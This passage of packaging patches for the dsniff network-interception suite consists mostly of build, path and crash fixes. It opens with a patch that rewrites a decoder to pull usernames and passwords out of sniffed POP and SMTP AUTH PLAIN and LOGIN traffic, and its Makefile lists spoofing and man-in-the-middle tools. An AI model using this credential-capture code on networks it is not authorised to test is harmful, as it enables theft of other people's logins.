olen); 49 | - 50 | - /* Decode SASL auth. */ 51 | - for (i = 0; i < 2 && (p = strtok(NULL, "\r\n")); i++) { 52 | - strlcat(obuf, p, olen); 53 | - j = base64_pton(p, p, strlen(p)); 54 | - p[j] = '\0'; 55 | - strlcat(obuf, " [", olen); 56 | - strlcat(obuf, p, olen); 57 | - strlcat(obuf, "]\n", olen); 58 | + if (mode == NONE) { 59 | + user = NULL; 60 | + password = NULL; 61 | + if (strncasecmp(p, "AUTH PLAIN", 10) == 0) { 62 | + mode = AUTHPLAIN; 63 | + continue; 64 | + } 65 | + if (strncasecmp(p, "AUTH LOGIN", 10) == 0) { 66 | + mode = AUTHLOGIN; 67 | + continue; 68 | + } 69 | + if (strncasecmp(p, "USER ", 5) == 0) { 70 | + mode = USERPASS; 71 | + /* the traditional login cuts right to the case, 72 | + * so no continue here 73 | + */ 74 | } 75 | } 76 | - /* Save regular POP2, POP3 auth info. */ 77 | - else if (strncasecmp(p, "USER ", 5) == 0 || 78 | - strncasecmp(p, "PASS ", 5) == 0 || 79 | - strncasecmp(p, "HELO ", 5) == 0) { 80 | - strlcat(obuf, p, olen); 81 | - strlcat(obuf, "\n", olen); 82 | + printf("(%d) %s\n", mode, p); 83 | + if (mode == USERPASS) { 84 | + if (strncasecmp(p, "USER ", 5) == 0) { 85 | + user = &p[5]; 86 | + } else if (strncasecmp(p, "PASS ", 5) == 0) { 87 | + password = &p[5]; 88 | + } 89 | + } 90 | + 91 | + if (mode == AUTHPLAIN) { 92 | + j = base64_pton(p, p, strlen(p)); 93 | + p[j] = '\0'; 94 | + n = 0; 95 | + s = p; 96 | + /* p consists of three parts, divided by \0 */ 97 | + while (s <= &p[j] && n<=3) { 98 | + if (n == 0) { 99 | + /* we do not process this portion yet */ 100 | + } else if (n == 1) { 101 | + user = s; 102 | + } else if (n == 2) { 103 | + password = s; 104 | + } 105 | + n++; 106 | + while (*s) s++; 107 | + s++; 108 | + } 109 | + } 110 | + 111 | + if (mode == AUTHLOGIN) { 112 | + j = base64_pton(p, p, strlen(p)); 113 | + p[j] = '\0'; 114 | + if (! user) { 115 | + user = p; 116 | + } else { 117 | + password = p; 118 | + /* got everything we need :-) */ 119 | + } 120 | + } 121 | + 122 | + if (user && password) { 123 | + strlcat(obuf, "\nusername [", olen); 124 | + strlcat(obuf, user, olen); 125 | + strlcat(obuf, "] password [", olen); 126 | + strlcat(obuf, password, olen); 127 | + strlcat(obuf, "]\n", olen); 128 | + 129 | + mode = NONE; 130 | } 131 | } 132 | return (strlen(obuf)); 133 | -------------------------------------------------------------------------------- /debian/patches/20_debian_dirs.patch: -------------------------------------------------------------------------------- 1 | Author: Steve Kemp 2 | Description: Adapt to Debian directory structure. 3 | --- 4 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 5 | 6 | --- a/Makefile.in 7 | +++ b/Makefile.in 8 | @@ -11,7 +11,7 @@ 9 | install_prefix = 10 | prefix = @prefix@ 11 | exec_prefix = @exec_prefix@ 12 | -libdir = @libdir@ 13 | +libdir = $(prefix)/share/dsniff 14 | sbindir = @sbindir@ 15 | mandir = @mandir@ 16 | 17 | @@ -37,8 +37,7 @@ 18 | X11INC = @X_CFLAGS@ 19 | X11LIB = @X_LIBS@ @X_PRE_LIBS@ -lXmu -lX11 @X_EXTRA_LIBS@ 20 | 21 | -INCS = -I. $(NIDSINC) $(PCAPINC) $(LNETINC) $(DBINC) $(SSLINC) $(X11INC) \ 22 | - -I$(srcdir)/missing 23 | +INCS = -I. $(X11INC) -I$(srcdir)/missing 24 | LIBS = @LIBS@ -L$(srcdir) -lmissing 25 | 26 | INSTALL = @INSTALL@ 27 | --- a/dnsspoof.8 28 | +++ b/dnsspoof.8 29 | @@ -31,7 +31,7 @@ 30 | address queries on the LAN with an answer of the local machine's IP 31 | address. 32 | .SH FILES 33 | -.IP \fI/usr/local/lib/dnsspoof.hosts\fR 34 | +.IP \fI/usr/share/dsniff/dnsspoof.hosts\fR 35 | Sample hosts file. 36 | .SH "SEE ALSO" 37 | dsniff(8), hosts(5) 38 | --- a/dsniff.8 39 | +++ b/dsniff.8 40 | @@ -68,9 +68,9 @@ 41 | On a hangup signal \fBdsniff\fR will dump its current trigger table to 42 | \fIdsniff.services\fR. 43 | .SH FILES 44 | -.IP \fI/usr/local/lib/dsniff.services\fR 45 | +.IP \fI/usr/share/dsniff/dsniff.services\fR 46 | Default trigger table 47 | -.IP \fI/usr/local/lib/dsniff.magic\fR 48 | +.IP \fI/usr/share/dsniff/dsniff.magic\fR 49 | Network protocol magic 50 | .SH "SEE ALSO" 51 | arpspoof(8), libnids(3), services(5), magic(5) 52 | --- a/pathnames.h 53 | +++ b/pathnames.h 54 | @@ -12,7 +12,7 @@ 55 | #define PATHNAMES_H 56 | 57 | #ifndef DSNIFF_LIBDIR 58 | -#define DSNIFF_LIBDIR "/usr/local/lib/" 59 | +#define DSNIFF_LIBDIR "/usr/share/dsniff/" 60 | #endif 61 | 62 | #define DSNIFF_SERVICES "dsniff.services" 63 | -------------------------------------------------------------------------------- /debian/patches/21_msgsnarf_segfault.patch: -------------------------------------------------------------------------------- 1 | Author: 2 | Description: Correctly 0 out the c struct. 3 | --- 4 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 5 | 6 | --- a/msgsnarf.c 7 | +++ b/msgsnarf.c 8 | @@ -584,6 +584,7 @@ 9 | if (i == 0) { 10 | if ((c = malloc(sizeof(*c))) == NULL) 11 | nids_params.no_mem("sniff_msgs"); 12 | + memset(c, 0, sizeof(*c)); 13 | c->ip = ts->addr.saddr; 14 | c->nick = strdup("unknown"); 15 | SLIST_INSERT_HEAD(&client_list, c, next); 16 | -------------------------------------------------------------------------------- /debian/patches/22_handlepp.patch: -------------------------------------------------------------------------------- 1 | Author: Joerg Dorchain 2 | Description: Add tcpkill support for handle ppp interfaces. 3 | --- 4 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 5 | 6 | --- a/pcaputil.c 7 | +++ b/pcaputil.c 8 | @@ -52,6 +52,9 @@ 9 | case DLT_NULL: 10 | offset = 4; 11 | break; 12 | + case DLT_LINUX_SLL: /* e.g. ppp */ 13 | + offset = 16; 14 | + break; 15 | default: 16 | warnx("unsupported datalink type"); 17 | break; 18 | -------------------------------------------------------------------------------- /debian/patches/23_urlsnarf_timestamp.patch: -------------------------------------------------------------------------------- 1 | Author: Hilko Bengen 2 | Description: urlsnarf: use timestamps from pcap file if available. 3 | Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=573365 4 | --- 5 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 6 | 7 | --- a/urlsnarf.c 8 | +++ b/urlsnarf.c 9 | @@ -36,6 +36,7 @@ 10 | u_short Opt_dns = 1; 11 | int Opt_invert = 0; 12 | regex_t *pregex = NULL; 13 | +time_t tt = 0; 14 | 15 | static void 16 | usage(void) 17 | @@ -57,9 +58,12 @@ 18 | { 19 | static char tstr[32], sign; 20 | struct tm *t, gmt; 21 | - time_t tt = time(NULL); 22 | int days, hours, tz, len; 23 | 24 | + if (!nids_params.filename) { 25 | + tt = time(NULL); 26 | + } 27 | + 28 | gmt = *gmtime(&tt); 29 | t = localtime(&tt); 30 | 31 | @@ -312,9 +316,48 @@ 32 | 33 | nids_register_chksum_ctl(&chksum_ctl, 1); 34 | 35 | - nids_run(); 36 | - 37 | - /* NOTREACHED */ 38 | + pcap_t *p; 39 | + char pcap_errbuf[PCAP_ERRBUF_SIZE]; 40 | + if (nids_params.filename == NULL) { 41 | + /* adapted from libnids.c:open_live() */ 42 | + if (strcmp(nids_params.device, "all") == 0) 43 | + nids_params.device = "any"; 44 | + p = pcap_open_live(nids_params.device, 16384, 45 | + (nids_params.promisc != 0), 46 | + 0, pcap_errbuf); 47 | + if (!p) { 48 | + fprintf(stderr, "pcap_open_live(): %s\n", 49 | + pcap_errbuf); 50 | + exit(1); 51 | + } 52 | + } 53 | + else { 54 | + p = pcap_open_offline(nids_params.filename, 55 | + pcap_errbuf); 56 | + if (!p) { 57 | + fprintf(stderr, "pcap_open_offline(%s): %s\n", 58 | + nids_params.filename, pcap_errbuf); 59 | + } 60 | + } 61 | + 62 | + struct pcap_pkthdr *h; 63 | + u_char *d; 64 | + int rc; 65 | + while ((rc = pcap_next_ex(p, &h, &d)) == 1) { 66 | + tt = h->ts.tv_sec; 67 | + nids_pcap_handler(NULL, h, d); 68 | + } 69 | + switch (rc) { 70 | + case(-2): /* end of pcap file */ 71 | + case(0): /* timeout on live capture */ 72 | + break; 73 | + case(-1): 74 | + default: 75 | + fprintf(stderr, "rc = %i\n", rc); 76 | + pcap_perror(p, "pcap_read_ex()"); 77 | + exit(1); 78 | + break; 79 | + } 80 | 81 | exit(0); 82 | } 83 | -------------------------------------------------------------------------------- /debian/patches/25_fix-spelling-errors.patch: -------------------------------------------------------------------------------- 1 | Description: Fix minor spelling error in source code 2 | Author: Marcos Fouces 3 | --- 4 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 5 | 6 | 7 | --- a/remote.c 8 | +++ b/remote.c 9 | @@ -652,7 +652,7 @@ 10 | if (remote_command_count > 0) 11 | { 12 | fprintf (stderr, 13 | - "%s: the `-id' option must preceed all `-remote' options.\n", 14 | + "%s: the `-id' option must precede all `-remote' options.\n", 15 | progname); 16 | usage (); 17 | exit (-1); 18 | -------------------------------------------------------------------------------- /debian/patches/30_pntohl_shift.patch: -------------------------------------------------------------------------------- 1 | Description: Corrects the incorrect bit-shift in pntohl(), the left-shift should be 8 bits, not 18. 2 | Author: Matthew Boyle 3 | Origin: http://pkgs.fedoraproject.org/cgit/rpms/dsniff.git/tree/dsniff-2.4-pntohl_shift.patch 4 | Bug-RedHat: https://bugzilla.redhat.com/show_bug.cgi?id=714958 5 | Bug-RedHat: https://bugzilla.redhat.com/show_bug.cgi?id=850496 6 | --- 7 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 8 | 9 | --- a/decode.h 10 | +++ b/decode.h 11 | @@ -35,7 +35,7 @@ 12 | (u_short)*((u_char *)p+0)<<8)) 13 | 14 | #define pntohl(p) ((u_int32_t)*((u_char *)p+3)<<0| \ 15 | - (u_int32_t)*((u_char *)p+2)<<18| \ 16 | + (u_int32_t)*((u_char *)p+2)<<8| \ 17 | (u_int32_t)*((u_char *)p+1)<<16| \ 18 | (u_int32_t)*((u_char *)p+0)<<24) 19 | 20 | -------------------------------------------------------------------------------- /debian/patches/31_sysconf_clocks.patch: -------------------------------------------------------------------------------- 1 | Description: Adds a clock fix. It was improved by Robert Scheck 2 | to work with older Linux kernel versions, too. 3 | Author: 4 | Origin: http://pkgs.fedoraproject.org/cgit/rpms/dsniff.git/tree/dsniff-2.4-sysconf_clocks.patch 5 | --- 6 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 7 | 8 | --- a/sshow.c 9 | +++ b/sshow.c 10 | @@ -217,7 +217,9 @@ 11 | { 12 | clock_t delay; 13 | int payload; 14 | - long CLK_TCK= sysconf(_SC_CLK_TCK); 15 | +#if defined(_SC_CLK_TCK) 16 | + long CLK_TCK = sysconf(_SC_CLK_TCK); 17 | +#endif 18 | 19 | delay = add_history(session, 0, cipher_size, plain_range); 20 | 21 | @@ -266,7 +268,9 @@ 22 | clock_t delay; 23 | int skip; 24 | range string_range; 25 | - long CLK_TCK= sysconf(_SC_CLK_TCK); 26 | +#if defined(_SC_CLK_TCK) 27 | + long CLK_TCK = sysconf(_SC_CLK_TCK); 28 | +#endif 29 | 30 | delay = add_history(session, 1, cipher_size, plain_range); 31 | 32 | -------------------------------------------------------------------------------- /debian/patches/32_rpc_segfault.patch: -------------------------------------------------------------------------------- 1 | Description: avoids xdrs being used without being initialised first. Without this 2 | patch dsniff segfaults when decoding RPC packets on x86_64. 3 | Author: Matthew Boyle 4 | Origin: http://pkgs.fedoraproject.org/cgit/rpms/dsniff.git/tree/dsniff-2.4-rpc_segfault.patch 5 | --- 6 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 7 | 8 | --- a/rpc.c 9 | +++ b/rpc.c 10 | @@ -125,6 +125,9 @@ 11 | return (0); 12 | } 13 | } 14 | + else 15 | + return (0); 16 | + 17 | stat = xdr_getpos(&xdrs); 18 | xdr_destroy(&xdrs); 19 | 20 | -------------------------------------------------------------------------------- /debian/patches/33_sshcrypto_DES.patch: -------------------------------------------------------------------------------- 1 | Description: improves 18_sshcrypto.patch 2 | - Replace all des_ methods and structs with DES_ equivalents. 3 | - Remove openssl/des_old.h include. 4 | - Register dependencies on OpenSSL, glib20 and gettext. 5 | Author: jca 6 | Origin: OpenBSD 7 | --- 8 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 9 | 10 | --- a/sshcrypto.c 11 | +++ b/sshcrypto.c 12 | @@ -30,8 +30,8 @@ 13 | 14 | #if 0 15 | struct des3_state { 16 | - des_key_schedule k1, k2, k3; 17 | - des_cblock iv1, iv2, iv3; 18 | + DES_key_schedule k1, k2, k3; 19 | + DES_cblock iv1, iv2, iv3; 20 | }; 21 | #endif 22 | 23 | @@ -162,13 +162,13 @@ 24 | if ((state = malloc(sizeof(*state))) == NULL) 25 | err(1, "malloc"); 26 | 27 | - des_set_key((void *)sesskey, state->k1); 28 | - des_set_key((void *)(sesskey + 8), state->k2); 29 | + DES_set_key((void *)sesskey, &state->k1); 30 | + DES_set_key((void *)(sesskey + 8), &state->k2); 31 | 32 | if (len <= 16) 33 | - des_set_key((void *)sesskey, state->k3); 34 | + DES_set_key((void *)sesskey, &state->k3); 35 | else 36 | - des_set_key((void *)(sesskey + 16), state->k3); 37 | + DES_set_key((void *)(sesskey + 16), &state->k3); 38 | 39 | memset(state->iv1, 0, 8); 40 | memset(state->iv2, 0, 8); 41 | @@ -184,9 +184,9 @@ 42 | estate = (struct des3_state *)state; 43 | memcpy(estate->iv1, estate->iv2, 8); 44 | 45 | - des_ncbc_encrypt(src, dst, len, estate->k1, &estate->iv1, DES_ENCRYPT); 46 | - des_ncbc_encrypt(dst, dst, len, estate->k2, &estate->iv2, DES_DECRYPT); 47 | - des_ncbc_encrypt(dst, dst, len, estate->k3, &estate->iv3, DES_ENCRYPT); 48 | + DES_ncbc_encrypt(src, dst, len, &estate->k1, &estate->iv1, DES_ENCRYPT); 49 | + DES_ncbc_encrypt(dst, dst, len, &estate->k2, &estate->iv2, DES_DECRYPT); 50 | + DES_ncbc_encrypt(dst, dst, len, &estate->k3, &estate->iv3, DES_ENCRYPT); 51 | } 52 | 53 | void 54 | @@ -197,8 +197,8 @@ 55 | dstate = (struct des3_state *)state; 56 | memcpy(dstate->iv1, dstate->iv2, 8); 57 | 58 | - des_ncbc_encrypt(src, dst, len, dstate->k3, &dstate->iv3, DES_DECRYPT); 59 | - des_ncbc_encrypt(dst, dst, len, dstate->k2, &dstate->iv2, DES_ENCRYPT); 60 | - des_ncbc_encrypt(dst, dst, len, dstate->k1, &dstate->iv1, DES_DECRYPT); 61 | + DES_ncbc_encrypt(src, dst, len, &dstate->k3, &dstate->iv3, DES_DECRYPT); 62 | + DES_ncbc_encrypt(dst, dst, len, &dstate->k2, &dstate->iv2, DES_ENCRYPT); 63 | + DES_ncbc_encrypt(dst, dst, len, &dstate->k1, &dstate->iv1, DES_DECRYPT); 64 | } 65 | #endif 66 | -------------------------------------------------------------------------------- /debian/patches/34_fix-parallel-FTBFS.patch: -------------------------------------------------------------------------------- 1 | Description: Fix parallel FTBFS problems 2 | * Add libmissing.a as a dependency to each of the PROGS to ensure it is 3 | built before them. 4 | * Ensure mount.h is created before decode_mountd.o gets built. 5 | * Ensure nfs_prot.h is created before filesnarf.o gets built. 6 | Author: Lukas Schwaighofer 7 | Author: Adrian Bunk 8 | Bug-Debian: https://bugs.debian.org/860611 9 | Bug-Debian: https://bugs.debian.org/869086 10 | 11 | --- a/Makefile.in 12 | +++ b/Makefile.in 13 | @@ -75,16 +75,28 @@ 14 | .c.o: 15 | $(CC) $(CFLAGS) $(INCS) -c $(srcdir)/$*.c 16 | 17 | -all: libmissing.a $(PROGS) 18 | +all: $(PROGS) 19 | 20 | -mount.c: mount.x 21 | +mount.h: mount.x 22 | rpcgen -h mount.x -o mount.h 23 | + 24 | +mount.c: mount.x 25 | rpcgen -c mount.x -o mount.c 26 | 27 | -nfs_prot.c: nfs_prot.x 28 | +mount.o: mount.h 29 | + 30 | +decode_mountd.o: mount.h 31 | + 32 | +nfs_prot.h: nfs_prot.x 33 | rpcgen -h nfs_prot.x -o nfs_prot.h 34 | + 35 | +nfs_prot.c: nfs_prot.x 36 | rpcgen -c nfs_prot.x -o nfs_prot.c 37 | 38 | +nfs_prot.o: nfs_prot.h 39 | + 40 | +filesnarf.o: nfs_prot.h 41 | + 42 | $(LIBOBJS): 43 | $(CC) $(CFLAGS) $(INCS) -c $(srcdir)/missing/$*.c 44 | 45 | @@ -92,49 +104,49 @@ 46 | ar -cr $@ $(LIBOBJS) 47 | $(RANLIB) $@ 48 | 49 | -dsniff: $(HDRS) $(SRCS) $(OBJS) 50 | +dsniff: $(HDRS) $(SRCS) $(OBJS) libmissing.a 51 | $(CC) $(LDFLAGS) -o $@ $(OBJS) $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) $(DBLIB) $(SSLLIB) 52 | 53 | -arpspoof: arpspoof.o arp.o 54 | +arpspoof: arpspoof.o arp.o libmissing.a 55 | $(CC) $(LDFLAGS) -o $@ arpspoof.o arp.o $(LIBS) $(PCAPLIB) $(LNETLIB) 56 | 57 | -dnsspoof: dnsspoof.o pcaputil.o 58 | +dnsspoof: dnsspoof.o pcaputil.o libmissing.a 59 | $(CC) $(LDFLAGS) -o $@ dnsspoof.o pcaputil.o $(LIBS) $(PCAPLIB) $(LNETLIB) 60 | 61 | -filesnarf: nfs_prot.o filesnarf.o pcaputil.o rpc.o 62 | +filesnarf: nfs_prot.o filesnarf.o pcaputil.o rpc.o libmissing.a 63 | $(CC) $(LDFLAGS) -o $@ filesnarf.o nfs_prot.o pcaputil.o rpc.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) 64 | 65 | -macof: macof.o 66 | +macof: macof.o libmissing.a 67 | $(CC) $(LDFLAGS) -o $@ macof.o $(LIBS) $(PCAPLIB) $(LNETLIB) 68 | 69 | -mailsnarf: mailsnarf.o buf.o pcaputil.o 70 | +mailsnarf: mailsnarf.o buf.o pcaputil.o libmissing.a 71 | $(CC) $(LDFLAGS) -o $@ mailsnarf.o buf.o pcaputil.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) 72 | 73 | -msgsnarf: msgsnarf.o buf.o pcaputil.o 74 | +msgsnarf: msgsnarf.o buf.o pcaputil.o libmissing.a 75 | $(CC) $(LDFLAGS) -o $@ msgsnarf.o buf.o pcaputil.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) 76 | 77 | -sshmitm: sshmitm.o buf.o hex.o record.o ssh.o sshcrypto.o 78 | +sshmitm: sshmitm.o buf.o hex.o record.o ssh.o sshcrypto.o libmissing.a 79 | $(CC) $(LDFLAGS) -o $@ sshmitm.o buf.o hex.o record.o ssh.o sshcrypto.o $(LIBS) $(LNETLIB) $(DBLIB) $(SSLLIB) 80 | 81 | -sshow: sshow.o pcaputil.o 82 | +sshow: sshow.o pcaputil.o libmissing.a 83 | $(CC) $(LDFLAGS) -o $@ sshow.o pcaputil.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) 84 | 85 | -tcpkill: tcpkill.o pcaputil.o 86 | +tcpkill: tcpkill.o pcaputil.o libmissing.a 87 | $(CC) $(LDFLAGS) -o $@ tcpkill.o pcaputil.o $(LIBS) $(PCAPLIB) $(LNETLIB) 88 | 89 | -tcpnice: tcpnice.o pcaputil.o 90 | +tcpnice: tcpnice.o pcaputil.o libmissing.a 91 | $(CC) $(LDFLAGS) -o $@ tcpnice.o pcaputil.o $(LIBS) $(PCAPLIB) $(LNETLIB) 92 | 93 | -tcphijack: tcphijack.o pcaputil.o 94 | +tcphijack: tcphijack.o pcaputil.o libmissing.a 95 | $(CC) $(LDFLAGS) -o $@ tcphijack.o pcaputil.o $(LIBS) $(PCAPLIB) $(LNETLIB) 96 | 97 | -urlsnarf: urlsnarf.o base64.o buf.o pcaputil.o 98 | +urlsnarf: urlsnarf.o base64.o buf.o pcaputil.o libmissing.a 99 | $(CC) $(LDFLAGS) -o $@ urlsnarf.o base64.o buf.o pcaputil.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) 100 | 101 | -webmitm: webmitm.o base64.o buf.o decode_http.o record.o 102 | +webmitm: webmitm.o base64.o buf.o decode_http.o record.o libmissing.a 103 | $(CC) $(LDFLAGS) -o $@ webmitm.o base64.o buf.o decode_http.o record.o $(LIBS) $(LNETLIB) $(DBLIB) $(SSLLIB) 104 | 105 | -webspy: webspy.o base64.o buf.o remote.o 106 | +webspy: webspy.o base64.o buf.o remote.o libmissing.a 107 | $(CC) $(LDFLAGS) -o $@ webspy.o base64.o buf.o remote.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) $(X11LIB) 108 | 109 | install: 110 | -------------------------------------------------------------------------------- /debian/patches/35_Add_CPPFLAGS.patch: -------------------------------------------------------------------------------- 1 | Description: import CPPFLAGS in order to build an ELF binary that uses fortified libc functions. Now it is built with all default Debian compiler flags. 2 | Author: Marcos Fouces 3 | --- 4 | This patch header follows DEP-3: http://dep.debian.net/deps/dep3/ 5 | 6 | --- a/Makefile.in 7 | +++ b/Makefile.in 8 | @@ -11,12 +11,13 @@ 9 | install_prefix = 10 | prefix = @prefix@ 11 | exec_prefix = @exec_prefix@ 12 | -libdir = $(prefix)/share/dsniff 13 | +libdir = @libdir@ 14 | sbindir = @sbindir@ 15 | mandir = @mandir@ 16 | 17 | CC = @CC@ 18 | CFLAGS = @CFLAGS@ -DDSNIFF_LIBDIR=\"$(libdir)/\" 19 | +CPPFLAGS = @CPPFLAGS@ 20 | LDFLAGS = @LDFLAGS@ 21 | 22 | PCAPINC = @PCAPINC@ 23 | @@ -37,7 +38,8 @@ 24 | X11INC = @X_CFLAGS@ 25 | X11LIB = @X_LIBS@ @X_PRE_LIBS@ -lXmu -lX11 @X_EXTRA_LIBS@ 26 | 27 | -INCS = -I. $(X11INC) -I$(srcdir)/missing 28 | +INCS = -I. $(NIDSINC) $(PCAPINC) $(LNETINC) $(DBINC) $(SSLINC) $(X11INC) \ 29 | + -I$(srcdir)/missing 30 | LIBS = @LIBS@ -L$(srcdir) -lmissing 31 | 32 | INSTALL = @INSTALL@ 33 | @@ -73,7 +75,7 @@ 34 | CONFIGS = dsniff.magic dsniff.services dnsspoof.hosts 35 | 36 | .c.o: 37 | - $(CC) $(CFLAGS) $(INCS) -c $(srcdir)/$*.c 38 | + $(CC) $(CFLAGS) $(CPPFLAGS) $(INCS) -c $(srcdir)/$*.c 39 | 40 | all: $(PROGS) 41 | 42 | @@ -98,7 +100,7 @@ 43 | filesnarf.o: nfs_prot.h 44 | 45 | $(LIBOBJS): 46 | - $(CC) $(CFLAGS) $(INCS) -c $(srcdir)/missing/$*.c 47 | + $(CC) $(CFLAGS) $(CPPFLAGS) $(INCS) -c $(srcdir)/missing/$*.c 48 | 49 | libmissing.a: $(LIBOBJS) 50 | ar -cr $@ $(LIBOBJS) 51 | -------------------------------------------------------------------------------- /debian/patches/36_implicit_declarations.patch: -------------------------------------------------------------------------------- 1 | Description: fix implicit declarations compiler warning 2 | * switch to C99 uint64_t, remove now unnecessary xdr_u_int64_t function 3 | * include missing string.h for memset 4 | Author: Lukas Schwaighofer 5 | 6 | --- a/filesnarf.c 7 | +++ b/filesnarf.c 8 | @@ -55,30 +55,6 @@ 9 | exit(1); 10 | } 11 | 12 | -/* XXX - for nfs_prot_xdr.c */ 13 | -bool_t 14 | -xdr_u_int64_t(XDR *xdrs, u_int64_t *nump) 15 | -{ 16 | - int i = 1; 17 | - u_char *p = (u_char *)nump; 18 | - 19 | - if (*(char *)&i == 1) { /* endian haack. */ 20 | - if (xdr_u_long(xdrs, (u_long *)(p + 4))) 21 | - return (xdr_u_long(xdrs, (u_long *)p)); 22 | - } 23 | - else { 24 | - if (xdr_u_long(xdrs, (u_long *)p)) 25 | - return (xdr_u_long(xdrs, (u_long *)(p + 4))); 26 | - } 27 | - return (FALSE); 28 | -} 29 | - 30 | -bool_t 31 | -xdr_int64_t(XDR *xdrs, int64_t *nump) 32 | -{ 33 | - return (xdr_u_int64_t(xdrs, (u_int64_t *)nump)); 34 | -} 35 | - 36 | static void 37 | fh_map_init(void) 38 | { 39 | --- a/nfs_prot.x 40 | +++ b/nfs_prot.x 41 | @@ -190,7 +190,7 @@ 42 | /* 43 | * Basic data types 44 | */ 45 | -typedef u_int64_t uint64; 46 | +typedef uint64_t uint64; 47 | typedef int64_t int64; 48 | typedef unsigned int uint32; 49 | typedef int int32; 50 | --- a/sshcrypto.c 51 | +++ b/sshcrypto.c 52 | @@ -20,6 +20,7 @@ 53 | #include 54 | #include 55 | #include 56 | +#include 57 | 58 | #include "sshcrypto.h" 59 | 60 | -------------------------------------------------------------------------------- /debian/patches/37_fix-lib-and-share-dirs.patch: -------------------------------------------------------------------------------- 1 | Description: Fix directory location for data files. They were wrongly set to lib dirs. 2 | Author: Hank Leininger 3 | 4 | --- a/Makefile.in 5 | +++ b/Makefile.in 6 | @@ -11,7 +11,7 @@ 7 | install_prefix = 8 | prefix = @prefix@ 9 | exec_prefix = @exec_prefix@ 10 | -libdir = @libdir@ 11 | +libdir = $(prefix)/share/dsniff 12 | sbindir = @sbindir@ 13 | mandir = @mandir@ 14 | 15 | -------------------------------------------------------------------------------- /debian/patches/38_fix-pcap_init.patch: -------------------------------------------------------------------------------- 1 | Description: Resolve naming collision due to libpcap API changes 2 | dsniff was written with a function named pcap_init() that predates 3 | the one in libpcap and is entirely different. This patch renames it 4 | out of the way. 5 | Author: Dennis Filder 6 | Bug-Debian: https://bugs.debian.org/980588 7 | Last-Update: 2021-02-10 8 | --- 9 | --- a/tcpnice.c 10 | +++ b/tcpnice.c 11 | @@ -204,7 +204,7 @@ 12 | 13 | filter = copy_argv(argv); 14 | 15 | - if ((pd = pcap_init(intf, filter, 128)) == NULL) 16 | + if ((pd = pcap_init_dsniff(intf, filter, 128)) == NULL) 17 | errx(1, "couldn't initialize sniffing"); 18 | 19 | if ((pcap_off = pcap_dloff(pd)) < 0) 20 | --- a/dnsspoof.c 21 | +++ b/dnsspoof.c 22 | @@ -309,7 +309,7 @@ 23 | else snprintf(buf, sizeof(buf), "udp dst port 53 and not src %s", 24 | libnet_addr2name4(lnet_ip, LIBNET_DONT_RESOLVE)); 25 | 26 | - if ((pcap_pd = pcap_init(dev, buf, 128)) == NULL) 27 | + if ((pcap_pd = pcap_init_dsniff(dev, buf, 128)) == NULL) 28 | errx(1, "couldn't initialize sniffing"); 29 | 30 | if ((pcap_off = pcap_dloff(pcap_pd)) < 0) 31 | --- a/pcaputil.h 32 | +++ b/pcaputil.h 33 | @@ -11,7 +11,7 @@ 34 | #ifndef PCAPUTIL_H 35 | #define PCAPUTIL_H 36 | 37 | -pcap_t *pcap_init(char *intf, char *filter, int snaplen); 38 | +pcap_t *pcap_init_dsniff(char *intf, char *filter, int snaplen); 39 | 40 | int pcap_dloff(pcap_t *pd); 41 | 42 | --- a/tcpkill.c 43 | +++ b/tcpkill.c 44 | @@ -130,7 +130,7 @@ 45 | 46 | filter = copy_argv(argv); 47 | 48 | - if ((pd = pcap_init(intf, filter, 64)) == NULL) 49 | + if ((pd = pcap_init_dsniff(intf, filter, 64)) == NULL) 50 | errx(1, "couldn't initialize sniffing"); 51 | 52 | if ((pcap_off = pcap_dloff(pd)) < 0) 53 | --- a/pcaputil.c 54 | +++ b/pcaputil.c 55 | @@ -63,7 +63,7 @@ 56 | } 57 | 58 | pcap_t * 59 | -pcap_init(char *intf, char *filter, int snaplen) 60 | +pcap_init_dsniff(char *intf, char *filter, int snaplen) 61 | { 62 | pcap_t *pd; 63 | u_int net, mask; 64 | -------------------------------------------------------------------------------- /debian/patches/39_libtirpc.patch: -------------------------------------------------------------------------------- 1 | Author: Robert Scheck 2 | Description: allows building against libtirpc (as a separate library) given the Sun RPC 3 | support in glibc has been deprecated for a long time. 4 | 5 | --- a/Makefile.in 6 | +++ b/Makefile.in 7 | @@ -16,7 +16,7 @@ 8 | mandir = @mandir@ 9 | 10 | CC = @CC@ 11 | -CFLAGS = @CFLAGS@ -DDSNIFF_LIBDIR=\"$(libdir)/\" 12 | +CFLAGS = @CFLAGS@ -DDSNIFF_LIBDIR=\"$(libdir)/\" -I/usr/include/tirpc 13 | CPPFLAGS = @CPPFLAGS@ 14 | LDFLAGS = @LDFLAGS@ 15 | 16 | @@ -107,7 +107,7 @@ 17 | $(RANLIB) $@ 18 | 19 | dsniff: $(HDRS) $(SRCS) $(OBJS) libmissing.a 20 | - $(CC) $(LDFLAGS) -o $@ $(OBJS) $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) $(DBLIB) $(SSLLIB) 21 | + $(CC) $(LDFLAGS) -o $@ $(OBJS) $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) $(DBLIB) $(SSLLIB) -ltirpc 22 | 23 | arpspoof: arpspoof.o arp.o libmissing.a 24 | $(CC) $(LDFLAGS) -o $@ arpspoof.o arp.o $(LIBS) $(PCAPLIB) $(LNETLIB) 25 | @@ -116,7 +116,7 @@ 26 | $(CC) $(LDFLAGS) -o $@ dnsspoof.o pcaputil.o $(LIBS) $(PCAPLIB) $(LNETLIB) 27 | 28 | filesnarf: nfs_prot.o filesnarf.o pcaputil.o rpc.o 